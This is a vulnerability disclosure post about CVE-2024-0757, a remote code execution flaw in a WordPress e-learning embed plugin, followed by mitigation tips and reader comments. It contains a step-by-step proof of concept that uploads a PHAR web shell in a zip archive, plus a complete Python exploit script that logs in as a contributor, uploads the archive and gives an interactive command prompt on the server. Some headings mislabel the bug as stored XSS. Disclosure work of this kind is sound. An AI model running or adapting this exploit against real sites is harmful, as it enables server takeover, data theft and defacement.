In recent times, WordPress has become a predominant platform for website development due to its user-friendly interface and extensive plugin ecosystem. However, this popularity also makes it a prime target for security vulnerabilities. One such critical vulnerability, identified as CVE-2024-0757, allows remote code execution (RCE) through insecure file uploads in a zip archive by users with contributor rights in Insert or Embed Articulate Content into WordPress plugin. This article delves into the discovery, exploitation, and potential impact of this vulnerability, along with recommendations for securing WordPress installations.
| CVE | CVE-2024-0757 |
| Plugin | Insert or Embed Articulate Content into WordPress <= 4.3000000023 |
| Critical | Very High |
| All Time | 122 027 |
| Active installations | 3 000+ |
| Publicly Published | May 14, 2024 |
| Last Updated | May 14, 2024 |
| Researcher | Dmtirii Ignatyev |
| OWASP TOP-10 | A1: Injection |
| PoC | Yes |
| Exploit | No |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0757 https://wpscan.com/vulnerability/eccd017c-e442-46b6-b5e6-aec7bbd5f836/ |
| Plugin Security Certification by CleanTalk |  |
| Logo of the plugin |  |
Timeline
| January 16, 2024 | Plugin testing and vulnerability detection in the Insert or Embed Articulate Content into WordPress have been completed |
| January 16, 2024 | I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing |
| May 14, 2024 | Registered CVE-2024-0757 |
Discovery of the Vulnerability
The CVE-2024-0757 vulnerability was discovered during routine testing of a popular WordPress plugin used for inserting or embedding Articulate content. This plugin is commonly employed to integrate e-learning content into WordPress sites. The vulnerability specifically affects the file upload mechanism for authors who can upload zip files containing e-learning content. The flaw was identified when it was found that an attacker could embed malicious files within the zip archive, leading to potential code execution on the server.
Understanding of Stored XSS attack’s
Remote Code Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary code on a server remotely. In the context of WordPress, RCE can have devastating effects, enabling attackers to take control of the website, steal data, or deface web pages. Historically, WordPress and its plugins have faced several RCE vulnerabilities. For example, in 2020, a vulnerability in the File Manager plugin allowed attackers to upload malicious files and execute commands, highlighting the significant threat posed by insecure file upload mechanisms.
Exploiting the Stored XSS Vulnerability
Exploiting CVE-2024-0757 involves a few straightforward steps:
POC:
1) Go to http://your_site/wordpress/wp-admin/post-new.php and create new Post
2) Add e-Learning widget inside Page and upload a zip file in which will be two files. First – default HTML file like main.html, Second – Phar file with name like cmd.phar (inside this file will be PHP code)
3) After uploading check URL http://your_site/wordpress/wp-content/uploads/articulate_uploads/{name_of_zip}/cmd.phar?cmd=ls
4) You can use following exploit
____
import requests import sys from bs4 import BeautifulSoup import time import urllib3 import re urllib3.disable_warnings() def send_request(host,login,password): target = f"{host}/wp-login.php" print(target) s = requests.Session() data = { "log":f"{login}", "pwd":f"{password}", "wp-submit":"Log In", "redirect_to":"http://127.0.0.1/wp-admin/", "testcookie":"1" } request = s.post(target, data=data) nonce_url = f"{host}/wp-admin/post-new.php" nonce_text = s.get(nonce_url) nonce_array = re.search('_upload_file"\:"(.*?)"\,"_nonce_', nonce_text.text) nonce = nonce_array.group(1) new_id_array = re.search('<input type=\'hidden\' id=\'post_ID\' name=\'post_ID\' value=\'(.*)\' \/>', nonce_text.text) new_id = new_id_array.group(1) print("Nonce value: " + nonce) print("New Post Id: " + new_id) upload_url = f"{host}/wp-admin/admin-ajax.php" upload_files = { "async-upload": ('test.zip', open('test.zip','rb'), 'application/zip') } data_upload = { "chunk":"0", "chunks":"1", "_ajax_nonce":f"{nonce}", "action":"articulate_upload_file" } upload = s.post(upload_url, data=data_upload, files=upload_files) upload_regex = re.search('folder"\:"(.*?)"\,"path', upload.text) while True: print(" ") print("Pwn3d!!! ------- Try to use command:") print('') cmd = '' cmd_user = input("cmd > ") if cmd_user == 'exit': rce_url = f"{host}/wp-content/uploads/articulate_uploads/{upload_regex.group(1)}/cmd.phar?cmd=rm -r ../{upload_regex.group(1)}" rce = requests.get(rce_url) print('') print(rce.text) print('Good!') break else: rce_url = f"{host}/wp-content/uploads/articulate_uploads/{upload_regex.group(1)}/cmd.phar?cmd={cmd_user}" rce = requests.get(rce_url) print('') print(rce.text) print('[*]') def main(): if len(sys.argv) != 4: print("(+) usage: %s <target_url> <login_of_contributor> <password>" % sys.argv[0]) print('(+) eg: %s http://192.168.121.103/wordpress login password' % sys.argv[0]) sys.exit(-1) host = sys.argv[1] login = sys.argv[2] password = sys.argv[3] send_request(host,login,password) if __name__ == "__main__": main()
The potential risk of this vulnerability is significant, particularly for websites that allow multiple authors. An attacker exploiting this flaw could gain complete control over the WordPress site, leading to data breaches, website defacement, or the installation of further malicious software. In a real-world scenario, an attacker could leverage this vulnerability to exfiltrate sensitive data, deploy ransomware, or use the compromised site to launch further attacks against visitors.
Recommendations for Improved Security
To mitigate the risk posed by CVE-2024-0757 and similar vulnerabilities, the following measures are recommended:
- Plugin Security Reviews: Regularly audit and review plugins for security vulnerabilities, especially those handling file uploads.
- Restrict File Uploads: Limit file upload capabilities to trusted users and employ robust validation checks on uploaded files.
- Use Security Plugins: Implement security plugins that can detect and block suspicious activities, such as unexpected file uploads.
- Regular Backups: Maintain regular backups of your site to quickly recover in case of a security breach.
By taking proactive measures to address RCE vulnerabilities like CVE-2024-0757, WordPress website owners can enhance their security posture and safeguard against potential exploitation. Stay vigilant, stay secure.
#WordPressSecurity #RCE #WebsiteSafety #StayProtected #VeryHighVulnerability
Use CleanTalk solutions to improve the security of your website
DMITRII I.
This was fixed in 4.3000000023 back in January 2024 – I’m not sure why this one was ever published. You can see the release notes here:
https://wordpress.org/plugins/insert-or-embed-articulate-content-into-wordpress/#developers
Hello Brian.
Thank you for your comment.
We will verify the information and respond to you within 3 business days.
Hello,
Thank you for waiting.
The publication of a vulnerability is part of a security process aimed at transparency and informing the community. Even if a vulnerability has been fixed, the community has the right to know about the issues developers faced and how they were resolved. Publishing a vulnerability can serve an educational purpose, helping other developers and organizations learn from past mistakes. This contributes to the improvement of development practices and the overall enhancement of security. Providing information about resolved vulnerabilities allows users to understand the importance of installing updates and maintaining up-to-date software versions. This helps reduce risks and protect user data.
Best regards.